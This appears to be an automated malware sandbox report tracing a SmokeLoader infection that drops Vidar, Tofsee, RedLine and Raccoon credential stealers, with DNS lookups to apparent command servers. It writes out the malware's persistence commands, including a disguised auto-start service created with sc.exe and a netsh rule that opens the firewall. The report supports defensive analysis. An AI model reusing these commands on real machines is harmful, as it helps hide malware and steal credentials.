Jan 14, 2022 10:45:03.782224894 CET | 8.8.8.8 | 192.168.2.6 | 0x3885 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:45:04.989928961 CET | 8.8.8.8 | 192.168.2.6 | 0x721b | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:45:05.270993948 CET | 8.8.8.8 | 192.168.2.6 | 0x721b | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:45:05.384814024 CET | 8.8.8.8 | 192.168.2.6 | 0xaea6 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
Jan 14, 2022 10:45:05.585026979 CET | 8.8.8.8 | 192.168.2.6 | 0x5e9 | No error (0) | host-data-coin-11.com | | 8.209.70.0 | A (IP address) | IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:13.916101933 CET8.8.8.8192.168.2.60x2626No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:13.916101933 CET8.8.8.8192.168.2.60x2626No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:13.916101933 CET8.8.8.8192.168.2.60x2626No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:13.916101933 CET8.8.8.8192.168.2.60x2626No error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:13.916101933 CET8.8.8.8192.168.2.60x2626No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:13.916101933 CET8.8.8.8192.168.2.60x2626No error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                                                                                                    Jan 14, 2022 10:45:43.565538883 CET8.8.8.8192.168.2.60xadaNo error (0)patmushta.info94.142.143.116A (IP address)IN (0x0001)

HTTP Request Dependency Graph


Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 10:43:02
Start date: 14/01/2022
Path: C:\Users\user\Desktop\zmbGUZTICp.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\zmbGUZTICp.exe"
Imagebase: 0x400000
File size: 319488 bytes
MD5 hash: 9AF4D2022DC05C2DBBC4D218A8F0974C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 10:43:04
Start date: 14/01/2022
Path: C:\Users\user\Desktop\zmbGUZTICp.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\zmbGUZTICp.exe"
Imagebase: 0x400000
File size: 319488 bytes
MD5 hash: 9AF4D2022DC05C2DBBC4D218A8F0974C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.408517834.00000000005C1000.00000004.00020000.sdmp, Author: Joe Security
  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.408471084.0000000000580000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 10:43:10
Start date: 14/01/2022
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff6f22f0000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000000.392111314.0000000004151000.00000020.00020000.sdmp, Author: Joe Security
Reputation: high

General

Start time: 10:43:45
Start date: 14/01/2022
Path: C:\Users\user\AppData\Roaming\gdrgbdj
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\gdrgbdj
Imagebase: 0x400000
File size: 319488 bytes
MD5 hash: 9AF4D2022DC05C2DBBC4D218A8F0974C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 10:43:47
Start date: 14/01/2022
Path: C:\Users\user\AppData\Roaming\gdrgbdj
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\gdrgbdj
Imagebase: 0x400000
File size: 319488 bytes
MD5 hash: 9AF4D2022DC05C2DBBC4D218A8F0974C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.462828818.00000000020A1000.00000004.00020000.sdmp, Author: Joe Security
  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.462437704.0000000000460000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 10:43:49
Start date: 14/01/2022
Path: C:\Users\user\AppData\Local\Temp\1E7F.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\1E7F.exe
Imagebase: 0x400000
File size: 301056 bytes
MD5 hash: 277680BD3182EB0940BC356FF4712BEF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
  • Detection: 100%, Joe Sandbox ML
Reputation: moderate

                                                                                                                                                    General

                                                                                                                                                    Start time:10:43:52
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\2DB3.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\2DB3.exe
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:322560 bytes
                                                                                                                                                    MD5 hash:6009BCB680BE6C0F656AA157E56423DC
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                    Reputation:low

                                                                                                                                                    General

                                                                                                                                                    Start time:10:43:52
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                    Imagebase:0x7ff6b7590000
                                                                                                                                                    File size:51288 bytes
                                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:10:43:53
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5200 -ip 5200
                                                                                                                                                    Imagebase:0x1010000
                                                                                                                                                    File size:434592 bytes
                                                                                                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:10:43:56
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\309C.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\309C.exe
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:320512 bytes
                                                                                                                                                    MD5 hash:8B25D9317E18654C3F83EF8630D1DE16
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000B.00000003.465535302.0000000000660000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000B.00000002.483029167.0000000000630000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000B.00000002.482701616.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                    Reputation:low

                                                                                                                                                    General

                                                                                                                                                    Start time:10:43:58
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 520
                                                                                                                                                    Imagebase:0x1010000
                                                                                                                                                    File size:434592 bytes
                                                                                                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:10:43:59
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\3F71.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\3F71.exe
                                                                                                                                                    Imagebase:0x130000
                                                                                                                                                    File size:537088 bytes
                                                                                                                                                    MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.509652789.00000000035F1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                    • Detection: 100%, Joe Sandbox ML

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:02
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ozuqupbe\
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:02
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:03
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tejjnepq.exe" C:\Windows\SysWOW64\ozuqupbe\
                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                    File size:232960 bytes
                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:03
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff61de10000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:03
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\System32\sc.exe" create ozuqupbe binPath= "C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d\"C:\Users\user\AppData\Local\Temp\309C.exe\"" type= own start= auto DisplayName= "wifi support
                                                                                                                                                    Imagebase:0x7ff7ebed0000
                                                                                                                                                    File size:60928 bytes
                                                                                                                                                    MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    General

                                                                                                                                                    Start time:10:44:04
                                                                                                                                                    Start date:14/01/2022
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 10:44:04
Start date: 14/01/2022
Path: C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\sc.exe" description ozuqupbe "wifi internet conection
Imagebase: 0x1100000
File size: 60928 bytes
MD5 hash: 24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 10:44:05
Start date: 14/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 10:44:05
Start date: 14/01/2022
Path: C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\sc.exe" start ozuqupbe
Imagebase: 0x1100000
File size: 60928 bytes
MD5 hash: 24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 10:44:06
Start date: 14/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 10:44:06
Start date: 14/01/2022
Path: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d"C:\Users\user\AppData\Local\Temp\309C.exe"
Imagebase: 0x400000
File size: 15600640 bytes
MD5 hash: 310337FA2432C256984AA89486B74D95
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000018.00000003.484958252.0000000000650000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000018.00000002.487069234.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000018.00000002.488137960.0000000000ED0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000018.00000002.487496290.0000000000630000.00000040.00000001.sdmp, Author: Joe Security

General

Start time: 10:44:06
Start date: 14/01/2022
Path: C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Imagebase: 0x9e0000
File size: 82944 bytes
MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 10:44:07
Start date: 14/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 10:44:08
Start date: 14/01/2022
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: svchost.exe
Imagebase: 0xf20000
File size: 44520 bytes
MD5 hash: FA6C268A5B5BDA067A901764D203D433
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001B.00000002.639945191.00000000004D0000.00000040.00000001.sdmp, Author: Joe Security

General

Start time: 10:44:10
Start date: 14/01/2022
Path: C:\Users\user\AppData\Local\Temp\3F71.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\3F71.exe
Imagebase: 0xfa0000
File size: 537088 bytes
MD5 hash: D7DF01D8158BFADDC8BA48390E52F355
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001C.00000000.502914721.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001C.00000000.504088961.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001C.00000000.503538300.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001C.00000000.504557008.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

General

Start time: 10:44:11
Start date: 14/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase: 0x7ff6b7590000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 10:44:22
Start date: 14/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff6b7590000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 10:44:26
Start date: 14/01/2022
Path: C:\Users\user\AppData\Local\Temp\A7F0.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\A7F0.exe
Imagebase: 0x400000
File size: 905216 bytes
MD5 hash: 852D86F5BC34BF4AF7FA89C60569DF13
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 0000001F.00000002.640601105.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 0000001F.00000002.662718681.0000000004D60000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 0000001F.00000003.553585077.0000000004E00000.00000004.00000001.sdmp, Author: Joe Security

Disassembly

Code Analysis
